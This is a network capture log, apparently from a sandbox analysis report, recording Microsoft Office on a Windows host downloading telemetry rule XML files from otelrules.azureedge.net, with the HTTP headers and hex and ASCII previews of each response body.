                2024-10-07 01:27:00 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                Session IDSource IPSource PortDestination IPDestination Port
                101192.168.2.44984813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:00 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:00 GMT
                Content-Type: text/xml
                Content-Length: 1397
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                ETag: "0x8DC582BE7262739"
                x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012700Z-1657d5bbd48brl8we3nu8cxwgn000000031g00000000ns26
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                Session IDSource IPSource PortDestination IPDestination Port
                102192.168.2.44984913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:01 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1360
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                ETag: "0x8DC582BDDEB5124"
                x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48q6t9vvmrkd293mg00000002rg00000000gphz
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                103192.168.2.44985213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:01 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1397
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                ETag: "0x8DC582BDFD43C07"
                x-ms-request-id: 31868579-401e-008c-0af2-1686c2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48sqtlf1huhzuwq7000000002hg00000000af5x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                Session IDSource IPSource PortDestination IPDestination Port
                104192.168.2.44985013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:01 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1403
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                ETag: "0x8DC582BDCB4853F"
                x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48tqvfc1ysmtbdrg000000002s0000000001qfx
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:01 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                Session IDSource IPSource PortDestination IPDestination Port
                105192.168.2.44985113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:01 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1366
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                ETag: "0x8DC582BDB779FC3"
                x-ms-request-id: 52963dc7-601e-0084-0e74-176b3f000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48wd55zet5pcra0cg00000002ug000000005tay
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:01 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                Session IDSource IPSource PortDestination IPDestination Port
                106192.168.2.44985313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:01 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1360
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                ETag: "0x8DC582BDD74D2EC"
                x-ms-request-id: fbb49b00-e01e-00aa-4806-17ceda000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48tqvfc1ysmtbdrg000000002s0000000001qg5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                107192.168.2.44985413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:01 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:01 GMT
                Content-Type: text/xml
                Content-Length: 1427
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                ETag: "0x8DC582BE56F6873"
                x-ms-request-id: 08bf7a15-f01e-0020-7706-17956b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012701Z-1657d5bbd48brl8we3nu8cxwgn000000035g000000004n3x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:02 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                Session IDSource IPSource PortDestination IPDestination Port
                108192.168.2.44985613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:02 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:02 GMT
                Content-Type: text/xml
                Content-Length: 1401
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                ETag: "0x8DC582BE2A9D541"
                x-ms-request-id: b6fa471e-401e-0067-43e5-1609c2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012702Z-1657d5bbd48brl8we3nu8cxwgn000000031g00000000ns4e
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:02 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                Session IDSource IPSource PortDestination IPDestination Port
                109192.168.2.44985713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:02 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:02 GMT
                Content-Type: text/xml
                Content-Length: 1364
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                ETag: "0x8DC582BEB6AD293"
                x-ms-request-id: 77012b0e-b01e-0097-0bff-164f33000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012702Z-1657d5bbd48xdq5dkwwugdpzr0000000031g00000000nth3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:02 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                110192.168.2.44985513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:02 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:02 GMT
                Content-Type: text/xml
                Content-Length: 1390
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                ETag: "0x8DC582BE3002601"
                x-ms-request-id: 7d21ea5d-701e-0098-0502-17395f000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012702Z-1657d5bbd48t66tjar5xuq22r800000002vg0000000020m8
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:02 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                Session IDSource IPSource PortDestination IPDestination Port
                111192.168.2.44985813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:02 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:02 GMT
                Content-Type: text/xml
                Content-Length: 1391
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                ETag: "0x8DC582BDF58DC7E"
                x-ms-request-id: a18d9b1d-601e-0002-1f03-17a786000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012702Z-1657d5bbd48vhs7r2p1ky7cs5w000000033g00000000crby
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
